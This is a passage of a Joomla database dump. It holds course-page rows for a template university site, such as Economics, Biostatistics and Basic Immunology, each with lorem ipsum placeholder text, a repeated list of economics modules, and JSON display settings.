09:44:03',135,'','2014-04-10 06:42:53',135,0,'0000-00-00 00:00:00','2013-09-25 09:44:03','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',13,0,0,'','',1,465,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(67,116,'Programming Lnguage','programming-lnguage','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-26 06:29:18',135,'','2013-10-03 06:06:41',135,0,'0000-00-00 00:00:00','2013-09-26 06:29:18','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,13,'','',1,154,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(68,117,'H.R.M.','h-r-m','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-26 06:30:10',135,'','2013-10-03 06:07:20',135,0,'0000-00-00 00:00:00','2013-09-26 06:30:10','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,12,'','',1,161,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(69,118,'Business Math','business-math','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-26 06:30:41',135,'','2013-10-03 06:06:10',135,0,'0000-00-00 00:00:00','2013-09-26 06:30:41','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,11,'','',1,504,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(70,119,'Economics','economics','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-26 06:31:14',135,'','2013-10-03 06:07:38',135,0,'0000-00-00 00:00:00','2013-09-26 06:31:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,10,'','',1,333,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(72,132,'Introduction To Anthropology','introduction-to-anthropology','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:47:01',135,'','2013-10-03 06:06:58',135,0,'0000-00-00 00:00:00','2013-09-30 11:47:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,9,'','',1,153,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(73,133,'Biophysical Chemistry','biophysical-chemistry','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:51:29',135,'','2013-10-03 06:05:48',135,0,'0000-00-00 00:00:00','2013-09-30 11:51:29','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,8,'','',1,171,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(74,134,'Biostatistics','biostatistics','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:51:52',135,'','2013-10-03 06:06:01',135,0,'0000-00-00 00:00:00','2013-09-30 11:51:52','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,7,'','',1,294,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(75,135,'Basic Immunology','basic-immunology','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>\r\n<p> </p>\r\n<h4>Year 02 (Part IIA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul class=\"icon_check_sign\">\r\n<li>Microeconomics</li>\r\n<li>Macroeconomics</li>\r\n<li>Quantitative Methods in Economics</li>\r\n<li>Political and Sociological Aspects of Economics</li>\r\n<li>British Economic History</li>\r\n</ul>\r\n<p> </p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.</p>','',-2,0,0,19,'2013-09-30 11:52:12',135,'','2013-10-03 06:05:13',135,0,'0000-00-00 00:00:00','2013-09-30 11:52:12','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,6,'','',1,175,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(76,136,'Endocrinology','endocrinology','','<p> </p>\r\n<h4>Overview</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor.in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\r\n<p> </p>\r\n<h4>Year 01 (Part IA)</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>\r\n<p> </p>\r\n<ul 